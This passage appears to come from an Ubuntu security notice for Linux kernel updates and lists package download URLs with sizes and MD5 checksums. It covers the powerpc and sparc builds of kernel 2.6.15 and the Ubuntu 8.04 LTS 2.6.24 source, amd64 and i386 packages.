http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872596 8602056ab95806f02667587737cb3b59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb
  Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17386 1abc2376b554610aec23e87f60998358
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    85854 59c8914383ae0624690950d8f844c101
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    60378 183583ac6a0ab738109499861a861ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    70420 da9263ada0b850362f022c36b6769f22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115790 ac0661102201e3f682eda1052d987671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   168082 6f375034031b861fe42ba973c9390ded
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40380 c083f0781fb33b64329d10c233affde2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   149304 958f0b630326763cddddce5503f3319d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5:   773010 979da22c264d122841ea140319b365ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb
  Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb
  Size/MD5: 15017856 479231852577fdd0e402556287a02059
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb
  Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   163276 481deef18ee50e039791747737619c3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    59308 83efde441d0de3f09bb163e53016a300
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb
  Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz
  Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc
  Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb
  Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb
  Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb
  Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb
  Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    52646 2c736bab70f1efeade320f9062b74729
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   145458 3e087634d61556643c32e342214a0642
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb
  Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb
  Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb
  Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    21598 6d6c27b8756a70466451449e096bd149
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb
  Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb
  Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb
  Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb
  Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    23690 ceb5d148f00965516252470b41d00b56
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    26794 50bb7020338de7d00265de0765578291
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
